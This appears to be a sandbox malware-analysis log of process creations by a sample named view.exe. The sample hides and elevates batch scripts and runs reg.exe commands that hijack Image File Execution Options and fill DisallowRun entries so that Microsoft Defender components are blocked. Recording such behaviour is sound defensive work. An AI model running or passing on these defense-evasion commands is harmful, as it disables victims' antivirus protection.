                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /n /c yn /t 1 /d y
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\screen.exe 'C:\ProgramData\screen.exe' elevate 'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd'
                        Source: C:\ProgramData\screen.exeProcess created: C:\ProgramData\screen.exe 'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd'
                        Source: C:\ProgramData\screen.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Public.cmd' '
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe' /v Defender1 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCncProxy.exe' /v Defender2 /t REG_SZ /d 'cmd.exe' /f
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseIR.exe' /v Defender3 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseNdr.exe' /v Defender4 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseSampleUploader.exe' /v Defender5 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCE.exe' /v Defender6 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe' /v Defender7 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe' /v Defender8 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe' /v Defender9 /t REG_SZ /d 'cmd.exe' /f
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe' /v Defender10 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OfflineScannerShell.exe' /v Defender11 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender1 /t REG_SZ /d 'MsSense.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender2 /t REG_SZ /d 'SenseCncProxy.exe' /f
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender3 /t REG_SZ /d 'SenseIR.exe' /f
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender4 /t REG_SZ /d 'SenseNdr.exe' /f
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender6 /t REG_SZ /d 'SenseCE.exe' /f
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender7 /t REG_SZ /d 'ConfigSecurityPolicy.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender8 /t REG_SZ /d 'MpCmdRun.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender9 /t REG_SZ /d 'MsMpEng.exe' /f
                        Source: C:\Users\user\Desktop\view.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\StartPublic.cmd' '
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /n /c yn /t 1 /d y
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\screen.exe 'C:\ProgramData\screen.exe' elevate 'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd'
                        Source: C:\ProgramData\screen.exeProcess created: C:\ProgramData\screen.exe 'C:\ProgramData\screen.exe' exec hide 'C:\Users\Public\Public.cmd'
                        Source: C:\ProgramData\screen.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Public.cmd' '
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsSense.exe' /v Defender1 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCncProxy.exe' /v Defender2 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseIR.exe' /v Defender3 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseNdr.exe' /v Defender4 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseSampleUploader.exe' /v Defender5 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SenseCE.exe' /v Defender6 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe' /v Defender7 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe' /v Defender8 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe' /v Defender9 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe' /v Defender10 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OfflineScannerShell.exe' /v Defender11 /t REG_SZ /d 'cmd.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender1 /t REG_SZ /d 'MsSense.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender2 /t REG_SZ /d 'SenseCncProxy.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender3 /t REG_SZ /d 'SenseIR.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender4 /t REG_SZ /d 'SenseNdr.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender6 /t REG_SZ /d 'SenseCE.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender7 /t REG_SZ /d 'ConfigSecurityPolicy.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender8 /t REG_SZ /d 'MpCmdRun.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender9 /t REG_SZ /d 'MsMpEng.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender5 /t REG_SZ /d 'SenseSampleUploader.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender3 /t REG_SZ /d 'SenseIR.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun' /v Defender9 /t REG_SZ /d 'MsMpEng.exe' /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
